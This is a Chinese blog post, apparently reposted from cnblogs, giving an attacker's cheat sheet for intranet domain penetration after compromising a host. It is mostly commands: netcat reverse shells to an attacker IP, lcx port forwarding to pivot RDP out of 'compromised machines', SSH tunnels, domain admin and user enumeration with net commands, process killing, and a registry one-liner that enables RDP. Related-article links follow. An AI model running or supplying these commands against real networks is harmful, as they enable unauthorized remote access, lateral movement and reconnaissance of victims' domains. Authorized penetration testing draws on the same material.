博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
拿下主机后内网的信息收集
阅读量:4614 次
发布时间:2019-06-09

本文共 1611 字,大约阅读时间需要 5 分钟。

内网域渗透的先决条件


首先你要能拿下一台域内的机器,然后才能开始域渗透。道理很简单,就不啰嗦了。介绍一些windows反弹shell的方法:

.\nc.exe -e cmd.exe 192.168.1.1 4444.\nc 192.168.1.1 4444 -e /bin/sh
nc -l 4444 -vvv

内网穿外网


方案一 正想开口等连接  .\lcx.exe -slave 192.168.10.100 4444 192.168.20.201 3389 #192.168.20.201为内网肉机,192.168.10.100是边界肉机.\lcx.exe -listen 4444 8888 #在边界肉机上mstsc 192.168.10.100 8888 #在攻击者主机上
方案二 返向直接连回去  木马会连地址20.20.20.10 #在内网肉机配置木马,反连20.20.20.10是边界肉机,上线端口8888.\lcx.exe -listen 4444 8888 #在边界肉机上.\lcx.exe -slave 20.20.20.10 4444 127.0.0.1 4444 #在攻击者主机上
关于ssh端口转发ssh -C -f -N -g -L 55555:127.0.0.1:8080 a003797@127.0.0.1 #本地端口(55555)到目标地址(127.0.0.1)的目标端口(8080),后面是必须ssh到对方应该是对段的username@IP地址ssh -C -f -N -g -R 55555:127.0.0.1:8080 a003797@127.0.0.1 #目标地址(127.0.0.1)的目标端口(8080)到本地端口(55555),后面是必须ssh到对方应该是对段的username@IP地址ssh -C -f -N -g -D listen_port user@Tunnel_Host #不常用,动态监测
最后配置ssr代理不详细介绍

域渗透的信息收集


查询本机信息

C:\Windows\system32>fsutil.exe fsinfo drives #查询盘符信息    C:\Windows\system32>systeminfo #查询系统信息    C:\Windows\system32>ipconfig /all #查询网络信息

查询域信息

C:\Windows\system32>net view /domain#查询域    C:\Windows\system32>net group /domain #查询组    C:\Windows\system32>net user /domain #查询域用户    C:\Windows\system32>net group “domain admins” /domain #查询域管信息    C:\Windows\system32>net group "domain computer" /domain #查询域内机器信息

查看网络、服务、进程信息

C:\Windows\system32>netstat -anb -p tcp#查询网络服务及PID    C:\Windows\system32>tasklist #查看进程信息    C:\Windows\system32>taskkill /f /im process-name #杀掉进程

一键开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

转载于:https://www.cnblogs.com/KevinGeorge/p/9084615.html

你可能感兴趣的文章
Aspx小记
查看>>
升级到了IE11,在IE9以上无法加载css
查看>>
VIM下的跳转练习
查看>>
WPF TextBox PreviewTextInput handle IME (chinese)
查看>>
LR报:Error 27796 Failed to connect to server
查看>>
bzoj 2109: [Noi2010]Plane 航空管制
查看>>
哈姆雷特中大臣给即将远行儿子的忠告------流传百年的经典
查看>>
[*leetcode 22] Generate Parentheses
查看>>
[levelDB] Version Manager
查看>>
mumu模拟机安装证书
查看>>
[python]Pytest+selenium+git+jenkins持续集成
查看>>
瀑布流知识的延伸
查看>>
webapp优化
查看>>
不错的判断 UITextView 内容不超过20个字符串的方法
查看>>
dubbo源码volatile使用问题
查看>>
Python 迁移数据库
查看>>
Windows窗口的层次关系(转)
查看>>
移动端border:1px问题解决方案
查看>>
Effective C++ -----条款36:绝不重新定义继承而来的non-virtual函数
查看>>
Android Animation学习笔记
查看>>